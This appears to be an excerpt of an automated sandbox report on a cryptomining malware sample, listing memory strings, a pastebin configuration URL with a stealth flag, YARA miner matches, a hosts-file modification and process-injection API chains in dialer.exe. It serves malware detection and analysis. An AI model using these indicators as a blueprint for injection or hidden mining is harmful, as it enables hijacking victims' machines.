                    Source: lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                    Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
                    Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl)on
                    Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CCD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
                    Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crlv
                    Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                    Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                    Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                    Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                    Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: lsass.exe, 0000001B.00000003.2656931212.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3329017237.000002D6F0CE9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: lsass.exe, 0000001B.00000003.2647035965.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3327715364.000002D6F0C47000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136107573.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2179014845.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136260768.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3329583490.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: lsass.exe, 0000001B.00000002.3330772432.000002D6F0E0D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2647178461.000002D6F0E0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                    Source: lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                    Source: lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                    Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: lsass.exe, 0000001B.00000003.2647035965.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3327715364.000002D6F0C47000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136107573.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2179014845.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136260768.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3329583490.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                    Source: lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                    Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: lsass.exe, 0000001B.00000002.3327715364.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136080217.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
                    Source: lsass.exe, 0000001B.00000002.3325227158.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135784569.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                    Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
                    Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca(E
                    Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CCD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
                    Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2647035965.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3327715364.000002D6F0C47000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2656931212.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136107573.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3330772432.000002D6F0E0D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2647178461.000002D6F0E0D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2179014845.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136260768.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3329583490.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3329017237.000002D6F0CE9000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                    Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                    Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                    Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                    Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325227158.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135784569.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
                    Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
                    Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
                    Source: lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
                    Source: hiwA7Blv7C.exe, 00000000.00000002.2133799777.00000282F70D0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3330252561.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2136383610.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325846114.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/mJ
                    Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CC58000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CD3F000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000003.2171682791.000001888CCB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/mJdpKdhr
                    Source: dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/mJdpKdhr&
                    Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/mJdpKdhr--cinit-stealth-targets=Taskmgr.exe
                    Source: dialer.exe, 00000034.00000002.3320602236.000001888CD3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/mJdpKdhr4wO
                    Source: dialer.exe, 00000034.00000003.2171682791.000001888CCB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/mJdpKdhrTaskmgr.exe
                    Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/mJdpKdhrbdoyd.
                    Source: dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/mJnit-
                    Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                    System Summary

                    barindex
                    Source: 47.2.dialer.exe.246fae5cc20.0.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: 47.2.dialer.exe.246fae5cc20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Source: 47.2.dialer.exe.246fae5cc20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: 47.2.dialer.exe.246fae38c60.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: 47.2.dialer.exe.246fae38c60.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Source: 47.2.dialer.exe.246fae38c60.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: 47.2.dialer.exe.246fae35400.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: 47.2.dialer.exe.246fae35400.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Source: 47.2.dialer.exe.246fae35400.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: Process Memory Space: dialer.exe PID: 1060, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: C:\Windows\Temp\bzqlyietdwsj.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: C:\Windows\Temp\bzqlyietdwsj.tmp, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Source: C:\Windows\Temp\bzqlyietdwsj.tmp, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF68D3D10C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,14_2_00007FF68D3D10C0
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D0165E28C8 NtEnumerateValueKey,NtEnumerateValueKey,23_2_000002D0165E28C8
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F151253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,27_2_000002D6F151253C
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F151202C NtQuerySystemInformation,StrCmpNIW,27_2_000002D6F151202C
                    Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001D15B0828C8 NtEnumerateValueKey,NtEnumerateValueKey,31_2_000001D15B0828C8
                    Source: C:\Windows\System32\dialer.exeCode function: 42_2_00007FF6429510C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,42_2_00007FF6429510C0
                    Source: C:\Windows\System32\dialer.exeCode function: 47_2_00007FF75E942F50 NtOpenKey,47_2_00007FF75E942F50
                    Source: C:\Windows\System32\svchost.exeCode function: 54_2_00000200A19B202C NtQuerySystemInformation,StrCmpNIW,54_2_00000200A19B202C
                    Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\libtqlibdoyd.sysJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeFile deleted: C:\Windows\Temp\bzqlyietdwsj.tmpJump to behavior
                    Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF68D3D14D814_2_00007FF68D3D14D8
                    Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF68D3D226C14_2_00007FF68D3D226C
                    Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF68D3D256014_2_00007FF68D3D2560
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D016581F2C23_2_000002D016581F2C
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D0165938A823_2_000002D0165938A8
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D01658D0E023_2_000002D01658D0E0
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D0165E2B2C23_2_000002D0165E2B2C
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D0165F44A823_2_000002D0165F44A8
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D0165EDCE023_2_000002D0165EDCE0
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D016611F2C23_2_000002D016611F2C
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D0166238A823_2_000002D0166238A8
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D01661D0E023_2_000002D01661D0E0
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F14ED0E027_2_000002D6F14ED0E0
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F14F38A827_2_000002D6F14F38A8
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F14E1F2C27_2_000002D6F14E1F2C
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F151DCE027_2_000002D6F151DCE0
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F15244A827_2_000002D6F15244A8
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F1512B2C27_2_000002D6F1512B2C
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F157DCE027_2_000002D6F157DCE0
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F15844A827_2_000002D6F15844A8
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F1572B2C27_2_000002D6F1572B2C
                    Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000014E41FAD0E030_2_0000014E41FAD0E0
                    Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000014E41FB38A830_2_0000014E41FB38A8
                    Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000014E41FA1F2C30_2_0000014E41FA1F2C
                    Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000014E41FDDCE030_2_0000014E41FDDCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000014E41FE44A830_2_0000014E41FE44A8
                    Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000014E41FD2B2C30_2_0000014E41FD2B2C
                    Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001D15B051F2C31_2_000001D15B051F2C
                    Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001D15B05D0E031_2_000001D15B05D0E0
                    Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001D15B0638A831_2_000001D15B0638A8
                    Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001D15B082B2C31_2_000001D15B082B2C
                    Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001D15B08DCE031_2_000001D15B08DCE0
                    Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001D15B0944A831_2_000001D15B0944A8
                    Source: C:\Windows\System32\dialer.exeCode function: 42_2_00007FF6429514D842_2_00007FF6429514D8
                    Source: C:\Windows\System32\dialer.exeCode function: 42_2_00007FF64295226C42_2_00007FF64295226C
                    Source: C:\Windows\System32\dialer.exeCode function: 42_2_00007FF64295256042_2_00007FF642952560
                    Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023AF32C38A846_2_0000023AF32C38A8
                    Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023AF32BD0E046_2_0000023AF32BD0E0
                    Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023AF32B1F2C46_2_0000023AF32B1F2C
                    Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023AF32F44A846_2_0000023AF32F44A8
                    Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023AF32EDCE046_2_0000023AF32EDCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023AF32E2B2C46_2_0000023AF32E2B2C
                    Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000023C9FD6D0E050_2_0000023C9FD6D0E0
                    Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000023C9FD738A850_2_0000023C9FD738A8
                    Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000023C9FD61F2C50_2_0000023C9FD61F2C
                    Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000023C9FD9DCE050_2_0000023C9FD9DCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000023C9FDA44A850_2_0000023C9FDA44A8
                    Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000023C9FD92B2C50_2_0000023C9FD92B2C
                    Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001A1CA6ED0E051_2_000001A1CA6ED0E0
                    Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001A1CA6F38A851_2_000001A1CA6F38A8
                    Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001A1CA6E1F2C51_2_000001A1CA6E1F2C
                    Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001A1CA71DCE051_2_000001A1CA71DCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001A1CA7244A851_2_000001A1CA7244A8
